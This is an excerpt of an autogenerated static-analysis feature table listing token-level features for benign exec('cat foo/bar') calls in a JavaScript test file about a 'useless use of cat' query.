console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:14:127:66 | exec("c ... (out)}) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:14:127:66 | exec("c ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:19:127:31 | "cat foo/bar" | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:19:127:31 | "cat foo/bar" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:19:127:31 | "cat foo/bar" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:19:127:31 | "cat foo/bar" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:19:127:31 | "cat foo/bar" | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:19:127:31 | "cat foo/bar" | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:19:127:31 | "cat foo/bar" | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:19:127:31 | "cat foo/bar" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:34:127:65 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:34:127:65 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:34:127:65 | 'arguments' object of anonymous function | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:34:127:65 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:34:127:65 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:34:127:65 | (err, o ... g(out)} | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:34:127:65 | (err, o ... g(out)} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:34:127:65 | (err, o ... g(out)} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:34:127:65 | (err, o ... g(out)} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:34:127:65 | (err, o ... g(out)} | contextSurroundingFunctionParameters | ()\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:34:127:65 | (err, o ... g(out)} | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:34:127:65 | (err, o ... g(out)} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:34:127:65 | (err, o ... g(out)} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:34:127:65 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:34:127:65 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:34:127:65 | exceptional return of anonymous function | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:34:127:65 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:34:127:65 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:34:127:65 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:34:127:65 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:34:127:65 | return of anonymous function | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:34:127:65 | return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:34:127:65 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:35:127:37 | err | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:35:127:37 | err | contextSurroundingFunctionParameters | ()\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:35:127:37 | err | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:35:127:37 | err | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:35:127:37 | err | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:40:127:42 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:40:127:42 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:40:127:42 | out | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:40:127:42 | out | contextSurroundingFunctionParameters | ()\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:40:127:42 | out | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:40:127:42 | out | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:40:127:42 | out | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:40:127:42 | out | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:40:127:42 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:40:127:42 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:49:127:55 | console | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:49:127:55 | console | contextSurroundingFunctionParameters | ()\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:49:127:55 | console | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:49:127:55 | console | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:49:127:55 | console | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:49:127:59 | console.log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:49:127:59 | console.log | contextSurroundingFunctionParameters | ()\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:49:127:59 | console.log | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:49:127:59 | console.log | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:49:127:59 | console.log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:49:127:64 | console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:49:127:64 | console.log(out) | contextSurroundingFunctionParameters | ()\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:49:127:64 | console.log(out) | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:49:127:64 | console.log(out) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:49:127:64 | console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:49:127:64 | exceptional return of console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:49:127:64 | exceptional return of console.log(out) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:49:127:64 | exceptional return of console.log(out) | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:49:127:64 | exceptional return of console.log(out) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:49:127:64 | exceptional return of console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:57:127:59 | log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:57:127:59 | log | contextSurroundingFunctionParameters | ()\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:57:127:59 | log | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:57:127:59 | log | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:57:127:59 | log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:61:127:63 | out | CalleeFlexibleAccessPath | console.log | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:61:127:63 | out | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:61:127:63 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:61:127:63 | out | contextSurroundingFunctionParameters | ()\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:61:127:63 | out | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:61:127:63 | out | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:61:127:63 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:127:61:127:63 | out | receiverName | console | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:129:3:129:10 | someCall | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:129:3:129:10 | someCall | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:129:3:129:10 | someCall | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:129:3:129:10 | someCall | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:129:3:129:10 | someCall | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:129:3:131:3 | exceptional return of someCal ... ss.\\n ) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:129:3:131:3 | exceptional return of someCal ... ss.\\n ) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:129:3:131:3 | exceptional return of someCal ... ss.\\n ) | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:129:3:131:3 | exceptional return of someCal ... ss.\\n ) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:129:3:131:3 | exceptional return of someCal ... ss.\\n ) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:129:3:131:3 | someCal ... ss.\\n ) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:129:3:131:3 | someCal ... ss.\\n ) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:129:3:131:3 | someCal ... ss.\\n ) | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:129:3:131:3 | someCal ... ss.\\n ) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:129:3:131:3 | someCal ... ss.\\n ) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:2:130:5 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:2:130:5 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:2:130:5 | exec | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:2:130:5 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:2:130:5 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:2:130:54 | exceptional return of exec("c ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:2:130:54 | exceptional return of exec("c ... (out)}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:2:130:54 | exceptional return of exec("c ... (out)}) | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:2:130:54 | exceptional return of exec("c ... (out)}) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:2:130:54 | exceptional return of exec("c ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:2:130:54 | exec("c ... (out)}) | CalleeFlexibleAccessPath | someCall | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:2:130:54 | exec("c ... (out)}) | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:2:130:54 | exec("c ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:2:130:54 | exec("c ... (out)}) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:2:130:54 | exec("c ... (out)}) | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:2:130:54 | exec("c ... (out)}) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:2:130:54 | exec("c ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:7:130:19 | "cat foo/bar" | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:7:130:19 | "cat foo/bar" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:7:130:19 | "cat foo/bar" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:7:130:19 | "cat foo/bar" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:7:130:19 | "cat foo/bar" | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:7:130:19 | "cat foo/bar" | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:7:130:19 | "cat foo/bar" | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:7:130:19 | "cat foo/bar" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:22:130:53 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:22:130:53 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:22:130:53 | 'arguments' object of anonymous function | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:22:130:53 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:22:130:53 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:22:130:53 | (err, o ... g(out)} | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:22:130:53 | (err, o ... g(out)} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:22:130:53 | (err, o ... g(out)} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:22:130:53 | (err, o ... g(out)} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:22:130:53 | (err, o ... g(out)} | contextSurroundingFunctionParameters | ()\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:22:130:53 | (err, o ... g(out)} | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:22:130:53 | (err, o ... g(out)} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:22:130:53 | (err, o ... g(out)} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:22:130:53 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:22:130:53 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:22:130:53 | exceptional return of anonymous function | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:22:130:53 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:22:130:53 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:22:130:53 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:22:130:53 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:22:130:53 | return of anonymous function | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:22:130:53 | return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:22:130:53 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:23:130:25 | err | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:23:130:25 | err | contextSurroundingFunctionParameters | ()\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:23:130:25 | err | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:23:130:25 | err | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:23:130:25 | err | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:28:130:30 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:28:130:30 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:28:130:30 | out | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:28:130:30 | out | contextSurroundingFunctionParameters | ()\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:28:130:30 | out | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:28:130:30 | out | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:28:130:30 | out | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:28:130:30 | out | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:28:130:30 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:28:130:30 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:37:130:43 | console | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:37:130:43 | console | contextSurroundingFunctionParameters | ()\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:37:130:43 | console | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:37:130:43 | console | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:37:130:43 | console | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:37:130:47 | console.log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:37:130:47 | console.log | contextSurroundingFunctionParameters | ()\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:37:130:47 | console.log | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:37:130:47 | console.log | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:37:130:47 | console.log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:37:130:52 | console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:37:130:52 | console.log(out) | contextSurroundingFunctionParameters | ()\n(err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:37:130:52 | console.log(out) | enclosingFunctionBody | dead exec cat foo/bar err out console log out someCall exec cat foo/bar err out console log out exec cat foo/bar err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:37:130:52 | console.log(out) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:130:37:130:52 | console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| 